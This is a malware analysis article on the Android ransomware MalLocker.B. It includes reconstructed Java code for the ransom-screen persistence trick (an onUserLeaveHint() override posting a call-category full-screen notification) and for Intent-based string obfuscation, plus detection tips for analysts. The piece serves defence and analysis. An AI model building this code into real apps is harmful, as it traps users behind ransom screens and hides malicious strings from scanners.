In October of 2020, the Microsoft 365 Defender Research Team discovered a piece of sophisticated Android ransomware that utilized new techniques and behavior. Microsoft Defender detected the mobile ransomware as AndroidOS/MalLocker.B. This new Android malware variant is part of a ransomware family that’s been in the wild for a while but has continued to evolve.
This family of ransomware is being hosted on arbitrary websites and circulated on online forums using several different social engineering lures, which include posing as popular apps, cracked games, or media players. This new variant caught Microsoft’s attention because of its sophistication and the fact that it has managed to evade many available protections.
Like most Android ransomware, this strain doesn't block access to files by encrypting them. Instead, it blocks access to the device by displaying a screen that appears over every other window. That screen is the ransom note, which contains instructions on how to pay the ransom; the user's files are left untouched.
MalLocker has a new way of keeping its ransom note on screen. It displays the note using Android features that Microsoft had not previously seen leveraged by malware: the "call" notification category, one of the notification types Android treats as requiring immediate user attention.
It also overrides the "onUserLeaveHint()" callback of the Android Activity class. The framework invokes this callback when an activity is about to go into the background because of a user action, for example when the user presses the Home key. The malware connects these two components: when the ransom screen is about to be backgrounded, the callback posts a call-style notification that brings the ransom screen straight back to the foreground.
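The following is an added reconstruction of that lock-screen mechanism written against the Android SDK; it is not MalLocker's own code. The page says only that a "call" notification and onUserLeaveHint() are combined; that the notification carries a full-screen PendingIntent back to the ransom Activity is an assumption (it is the documented way a CATEGORY_CALL notification launches an Activity), and the channel id, notification id, layout resource and class name are made up.

```java
import android.app.Activity;
import android.app.Notification;
import android.app.NotificationChannel;
import android.app.NotificationManager;
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import android.os.Build;
import android.os.Bundle;

// Reconstruction for illustration, not the sample's code. Assumed names throughout.
public class RansomNoteActivity extends Activity {
    private static final String CHANNEL_ID = "incoming_call";   // assumed
    private static final int NOTIFICATION_ID = 0x4C4F434B;      // arbitrary

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // The ransom note is an ordinary full-screen Activity; nothing is encrypted.
        setContentView(R.layout.ransom_note);                   // assumed layout resource
    }

    // Fired when the Activity is about to go to the background because the user
    // chose to leave it (Home key, recents), not when another Activity merely covers it.
    @Override
    protected void onUserLeaveHint() {
        super.onUserLeaveHint();
        postCallNotification();
    }

    private void postCallNotification() {
        NotificationManager nm =
                (NotificationManager) getSystemService(Context.NOTIFICATION_SERVICE);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            // Android 8+ requires a channel; HIGH importance lets the notification interrupt.
            nm.createNotificationChannel(new NotificationChannel(
                    CHANNEL_ID, "Incoming call", NotificationManager.IMPORTANCE_HIGH));
        }

        // PendingIntent pointing back at this same Activity.
        Intent relaunch = new Intent(this, RansomNoteActivity.class)
                .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TOP);
        PendingIntent pi = PendingIntent.getActivity(this, 0, relaunch,
                PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);

        Notification.Builder b = (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O)
                ? new Notification.Builder(this, CHANNEL_ID)
                : new Notification.Builder(this);
        Notification n = b.setSmallIcon(android.R.drawable.sym_call_incoming)
                .setContentTitle("Incoming call")
                // CATEGORY_CALL marks the notification as one that needs immediate attention.
                .setCategory(Notification.CATEGORY_CALL)
                .setPriority(Notification.PRIORITY_MAX)
                // Assumption: the full-screen intent is what launches the Activity
                // immediately instead of showing a banner the user could ignore.
                .setFullScreenIntent(pi, true)
                .setOngoing(true)
                .build();
        nm.notify(NOTIFICATION_ID, n);
    }
}
```

Two things an analyst can check against this pattern: on Android 10 and later the app must declare the USE_FULL_SCREEN_INTENT permission in its manifest for the full-screen launch to work, so that permission in a "media player" or "cracked game" is a red flag; and an Activity that both overrides onUserLeaveHint() and posts a CATEGORY_CALL notification has no legitimate reason to do so outside a telephony app.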
MalLocker Employs a New Method of Decryption
The decryption routine is unusual as well: the string values passed to the decryption function do not correspond to the decrypted value at all. They are junk arguments, placed there so that an analyst who traces the function's inputs ends up looking at meaningless data.
On the Android platform, an Intent is a messaging object that app components use to coordinate separate Activities to perform a task: in essence, a request for an action from another app component.
An Intent carries a string value as its "action" parameter. MalLocker creates an Intent inside the decryption function, using the junk string it was passed as the initial action name for the Intent. It then decrypts a hardcoded encrypted value and stores the plaintext in the Intent's action field with the "setAction" API.
Once the Intent's action points at the decrypted content, the decryption function returns the Intent object, not a string, to its caller. The caller then invokes "getAction" to read the decrypted content. The effect is that a tool hunting for functions that return decrypted strings sees a function returning an Intent; the plaintext is only reachable through getAction, and the visible string arguments are decoys.
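As an added illustration of that Intent-as-string-carrier trick (not MalLocker's code): the cipher below is a single-byte XOR, and the key, ciphertext, method and action names are all assumptions chosen so the pattern is easy to see; the page does not give the real sample's algorithm or constants.

```java
import android.content.Intent;
import java.nio.charset.StandardCharsets;

// Illustration of the technique described above; all constants are assumed.
public final class StringCarrier {
    private StringCarrier() {}

    private static final byte KEY = 0x2A;                                   // assumed key
    // Constructed ciphertext: "unlock" XORed with KEY.
    private static final byte[] BLOB = {0x5F, 0x44, 0x46, 0x45, 0x49, 0x41};

    // The string argument is never used as ciphertext. It only seeds the Intent's
    // initial action, so tracing the argument back leads to junk, not to the secret.
    static Intent d(String junk) {
        Intent carrier = new Intent(junk);

        byte[] plain = new byte[BLOB.length];
        for (int i = 0; i < BLOB.length; i++) {
            plain[i] = (byte) (BLOB[i] ^ KEY);
        }

        // The plaintext is parked in the Intent's action field rather than returned.
        // A string-extraction pass that looks for String-returning decryptors sees
        // a function returning an Intent and moves on.
        carrier.setAction(new String(plain, StandardCharsets.US_ASCII));
        return carrier;
    }

    // Caller side: the decrypted value is read back through getAction(). This is
    // the call shape to search for when triaging a sample (junk literal in, getAction out).
    static String resolve() {
        return d("com.example.junk.ACTION_IGNORED").getAction();   // assumed junk literal
    }
}
```

For deobfuscation the useful observation is that every site has the same shape, a decryptor returning Intent immediately followed by getAction(), so the routine can be recognised syntactically and its hardcoded blob decrypted offline, or, dynamically, every Intent.getAction() return value can be logged while the sample runs to recover the strings without reversing the cipher.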